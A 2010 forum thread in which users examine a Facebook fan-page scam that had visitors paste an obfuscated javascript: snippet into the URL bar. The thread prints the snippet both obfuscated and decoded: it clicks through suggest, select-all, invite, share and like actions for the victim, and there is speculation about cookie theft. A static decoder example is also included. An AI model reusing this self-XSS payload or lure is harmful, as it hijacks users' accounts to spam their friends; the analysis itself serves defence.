Facebook JS Injection


Post by secdef9 on Fri Jul 09, 2010 12:43 am

So the other day on Facebook I stumbled upon a fanpage, similar to those ones where you have to "Like" the page before you can view some image/video whatever. Except this one interestingly required that users copy and paste some junk into their URL bar. That junk turned out to be the following:

Code:
javascript:(function(){a='app107489592636080_qjPdbG';b='app107489592636080_asAbCy';hWBkWd='app107489592636080_hWBkWd';RsApSf='app107489592636080_RsApSf';CXyYOD='app107489592636080_CXyYOD';var _0xa049=["\x76\x69\x73\x69\x62\x69\x6C\x69\x74\x79","\x73\x74\x79\x6C\x65","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x68\x69\x64\x64\x65\x6E","\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C","\x76\x61\x6C\x75\x65","\x63\x6C\x69\x63\x6B","\x73\x75\x67\x67\x65\x73\x74","\x73\x65\x6C\x65\x63\x74\x5F\x61\x6C\x6C","\x73\x67\x6D\x5F\x69\x6E\x76\x69\x74\x65\x5F\x66\x6F\x72\x6D","\x2F\x61\x6A\x61\x78\x2F\x73\x6F\x63\x69\x61\x6C\x5F\x67\x72\x61\x70\x68\x2F\x69\x6E\x76\x69\x74\x65\x5F\x64\x69\x61\x6C\x6F\x67\x2E\x70\x68\x70","\x73\x75\x62\x6D\x69\x74\x44\x69\x61\x6C\x6F\x67","\x73\x6C\x69\x6E\x6B","\x69\x6E\x70\x75\x74","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65","\x53\x68\x61\x72\x65","\x6C\x69\x6B\x65\x6D\x65"];d=document;d[_0xa049[2]](CXyYOD)[_0xa049[1]][_0xa049[0]]=_0xa049[3];d[_0xa049[2]](a)[_0xa049[4]]=d[_0xa049[2]](b)[_0xa049[5]];d[_0xa049[2]](_0xa049[7])[_0xa049[6]]();setTimeout(function (){fs[_0xa049[8]]();} ,5000);setTimeout(function (){SocialGraphManager[_0xa049[11]](_0xa049[9],_0xa049[10]);setTimeout(function (){d[_0xa049[2]](_0xa049[12])[_0xa049[6]]();setTimeout(function (){inp=document[_0xa049[14]](_0xa049[13]);for(i in inp){if(inp[i][_0xa049[5]]==_0xa049[15]){inp[i][_0xa049[6]]();} ;} ;setTimeout(function (){d[_0xa049[2]](_0xa049[16])[_0xa049[6]]();d[_0xa049[2]](RsApSf)[_0xa049[4]]=d[_0xa049[2]](hWBkWd)[_0xa049[5]];} ,5000);} ,3000);} ,3000);} ,5000);})();





Obfuscated Javascript injection. So I whipped up a simple app to translate the hexcode; there was still a lot of obfuscation involving arrays and whatnot. After sorting through all of that, I got the following:

Code:
javascript:(function () {
    // Hide one app element, then copy a hidden field's value into another element.
    document.getElementById('app107489592636080_ERqmQz').style.visibility = 'hidden';
    document.getElementById('app107489592636080_pxnzBW').innerHTML =
        document.getElementById('app107489592636080_FqafMk').value;

    // Click the element with id "suggest".
    document.getElementById('suggest').click();

    // After 5 s: call select_all() on the page's "fs" object.
    setTimeout(function () {
        fs.select_all();
    }, 5000);

    // After 5 s: submit the invite dialog, then chain the remaining clicks.
    setTimeout(function () {
        SocialGraphManager.submitDialog('sgm_invite_form', '/ajax/social_graph/invite_dialog.php');
        setTimeout(function () {
            document.getElementById('slink').click();
            setTimeout(function () {
                // Click every <input> whose value is "share".
                inp = document.getElementsByTagName('input');
                for (i in inp) {
                    if (inp[i].value == 'share') {
                        inp[i].click();
                    }
                }
                setTimeout(function () {
                    document.getElementById('likeme').click();
                    document.getElementById('app107489592636080_tsypQz').innerHTML =
                        document.getElementById('app107489592636080_AKgead').value;
                }, 5000);
            }, 3000);
        }, 3000);
    }, 5000);
})();

My preliminary guess is that this is just a simple injection that causes users to "Like" the page and "Suggest" it to friends. I'm not particularly familiar with the exact constructs that Facebook uses (referring to the "app107489592636080_pxnzBW" garbage and whatnot), so if anyone wants to clarify exactly what this code does that would be cool.

Does anyone have any thoughts on this? The page has since been deleted but it had nearly 600,000 fans. I'm personally thinking that this code could easily be modified to send users' cookies to a remote server that would then hijack the user's session (there is at least one tool available for this purpose, found here). If that's the case, does anyone else think this would be worthy of Facebook addressing? I know GMail sessions used to be easily hijacked, and I'm pretty sure Google fixed that by adding some form of server-side IP address verification.

My main concern is that nearly 600K people were fooled into injecting javascript into their own browsers.


EDIT: I looked at this some more. Turns out you couldn't use JS to capture the necessary cookies to hijack a FB session on most browsers, thanks to FB's use of the HttpOnly flag. But still.
Last edited by secdef9 on Wed Jul 14, 2010 1:57 am, edited 1 time in total.
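
The decoding step described in the post above, as an added example (not the poster's app and not part of the original thread): a static decoder that rewrites the hex-escaped string table and its index lookups as text, without ever evaluating the sample. The sample input is constructed and benign, and the function names are this example's own.

```javascript
// Added example: static decoder for the "hex string table + index lookup"
// obfuscation. It only rewrites text; the sample is never evaluated.
// Function names are this example's own, not from any library.

// Turn \xNN escapes inside a string-literal body into characters.
function decodeHexEscapes(body) {
  return body.replace(/\\x([0-9A-Fa-f]{2})/g,
    (_, h) => String.fromCharCode(parseInt(h, 16)));
}

// Locate `var _0xNNNN=["...","..."];` and decode every entry.
// Assumes no literal "]" inside the table (it is escaped as \x5D in this style).
function extractStringTable(src) {
  const m = /var\s+(_0x[0-9a-fA-F]+)\s*=\s*\[([^\]]*)\];?/.exec(src);
  if (!m) return null;
  const values = [];
  const literal = /"((?:[^"\\]|\\.)*)"/g;
  let s;
  while ((s = literal.exec(m[2])) !== null) values.push(decodeHexEscapes(s[1]));
  return { name: m[1], decl: m[0], values };
}

// Inline table lookups, then turn obj["ident"] into obj.ident for reading.
function deobfuscate(src) {
  const table = extractStringTable(src);
  if (!table) return src; // nothing recognised: return input unchanged
  const lookup = new RegExp(table.name + '\\[(\\d+)\\]', 'g');
  return src
    .replace(table.decl, '')
    .replace(lookup, (whole, i) =>
      Number(i) < table.values.length ? JSON.stringify(table.values[i]) : whole)
    .replace(/(?<=[\w$)\]])\["([A-Za-z_$][\w$]*)"\]/g, '.$1');
}

// Constructed, benign sample in the same style (not the payload from the post).
const hex = (s) => [...s].map((c) =>
  '\\x' + c.charCodeAt(0).toString(16).toUpperCase().padStart(2, '0')).join('');
const SAMPLE =
  'var _0x1a2b=[' +
  ['getElementById', 'style', 'visibility', 'hidden', 'banner']
    .map((s) => '"' + hex(s) + '"').join(',') +
  '];d=document;d[_0x1a2b[0]](_0x1a2b[4])[_0x1a2b[1]][_0x1a2b[2]]=_0x1a2b[3];';

console.log(extractStringTable(SAMPLE).values); // strings the script touches
console.log(deobfuscate(SAMPLE));               // readable form
```

The decoded string table on its own is often enough for triage, since it lists the DOM ids, method names and endpoints a pasted snippet will touch.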


Re: Facebook JS Injection

Post by TheNightFox on Fri Jul 09, 2010 1:12 am

Yeah, I've seen a few pages like this, fooling people into using a javascript injection. People are just stupid, that's all.
He alone, who owns the youth, gains the future.


Re: Facebook JS Injection

Post by sanddbox on Fri Jul 09, 2010 2:03 am

I often see pages that will have javascript to paste into the URL that will select all of your friends and all you have to do is click "invite". I get so much annoying spam because people are so stupid.

HTS User Composition:
95% Male
4.98% Female
.01% Monica
.01% Goat


Re: Facebook JS Injection

Post by madenchina21 on Tue Jul 13, 2010 3:27 pm

Yeah, a lot of pages are starting to do this and it's really annoying. Basically, what it is doing is opening the suggest to friends link, selecting the "select all" button, and then submitting and adding info to your browser telling them that you have completed the process. And like secdef9 said, people are being dumb and just doing this all willy-nilly and not knowing what they are doing, and it's really annoying.


Re: Facebook JS Injection

Post by msbachman on Tue Jul 13, 2010 4:56 pm

Or those scams like

CLICK HERE TO SEE A KID SHOT ON GOOGLE MAPS!!!!!!!!?!?!?!?!?!??!?!??!..........but first, you have to click here to invite all your friends!!!??!!?!?!??!?!?


That's a good litmus test to know which of your friends are morons and which aren't.
"I'm going to get into your sister. I'm going to get my hands on your daughter."
~Gatito


Re: Facebook JS Injection

Post by 0xBEEF1337 on Wed Jul 14, 2010 9:00 pm

Delete.


